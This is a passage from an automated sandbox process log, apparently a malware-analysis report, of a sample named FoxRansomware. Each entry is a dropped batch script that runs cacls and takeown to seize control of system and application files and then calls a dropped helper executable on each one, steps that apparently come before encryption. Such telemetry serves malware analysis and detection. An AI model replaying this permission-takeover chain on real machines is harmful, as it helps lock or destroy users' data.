C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "background.png" -nobanner3⤵
- Loads dropped DLL
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "background.png" -nobanner4⤵
- Executes dropped EXE
PID:576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵
- Loads dropped DLL
PID:1300 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:1408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:1608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵
- Loads dropped DLL
PID:2796 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:1340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:3464 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:3512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1508 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:3176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:2392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:3900 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:564
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵
- Loads dropped DLL
PID:3616 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MahjongMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3644 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MahjongMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵
- Loads dropped DLL
PID:2596 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:2772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵PID:3588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "RTC.der" -nobanner3⤵
- Loads dropped DLL
PID:3548 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "RTC.der" -nobanner4⤵
- Executes dropped EXE
PID:2804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵
- Loads dropped DLL
PID:1600 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:2896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵PID:3604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "end_review.gif" -nobanner3⤵
- Loads dropped DLL
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "end_review.gif" -nobanner4⤵
- Executes dropped EXE
PID:2512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵
- Loads dropped DLL
PID:3848 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:2308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "reviews_joined.gif" -nobanner3⤵
- Loads dropped DLL
PID:3956 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "reviews_joined.gif" -nobanner4⤵
- Executes dropped EXE
PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵
- Loads dropped DLL
PID:3360 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:4044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵
- Modifies file permissions
PID:4092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "server_ok.gif" -nobanner3⤵
- Loads dropped DLL
PID:3728 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "server_ok.gif" -nobanner4⤵
- Executes dropped EXE
PID:4060
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵
- Loads dropped DLL
PID:2616 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:3172
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵PID:1804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "warning.gif" -nobanner3⤵
- Loads dropped DLL
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "warning.gif" -nobanner4⤵
- Executes dropped EXE
PID:3580
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵
- Loads dropped DLL
PID:3000 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:3788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵PID:3772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵
- Loads dropped DLL
PID:3812 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵
- Executes dropped EXE
PID:2184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:3720
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:3844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:3724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "SY______.PFB" -nobanner3⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "SY______.PFB" -nobanner4⤵
- Executes dropped EXE
PID:1268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:3880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵
- Modifies file permissions
PID:3044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "brt.hyp" -nobanner3⤵PID:3868
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "brt.hyp" -nobanner4⤵PID:3988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:4056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:1988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:1728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "eng32.clx" -nobanner3⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "eng32.clx" -nobanner4⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2192
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:2948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:3040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:2824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:2924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:2868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:2252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:2888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:1040
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵PID:884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:2856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "ChessMCE.png" -nobanner3⤵PID:944
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "ChessMCE.png" -nobanner4⤵PID:3152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵PID:1644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:3004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "FreeCellMCE.png" -nobanner3⤵PID:3112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "FreeCellMCE.png" -nobanner4⤵PID:3128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵PID:1064
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:2676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "HeartsMCE.png" -nobanner3⤵PID:3228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "HeartsMCE.png" -nobanner4⤵PID:2460
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵PID:3284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:2224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵PID:1812
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵PID:3320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵PID:3344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "SolitaireMCE.png" -nobanner3⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "SolitaireMCE.png" -nobanner4⤵PID:3240
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3336
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵PID:928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:2472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵PID:1148
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵PID:1028
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:3428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:2444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "watermark.png" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "watermark.png" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:3456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:3460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:3996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:3236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:2592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵
- Modifies file permissions
PID:604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:2544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:2800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:3600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "bl.gif" -nobanner3⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "bl.gif" -nobanner4⤵PID:2132
-
-
-
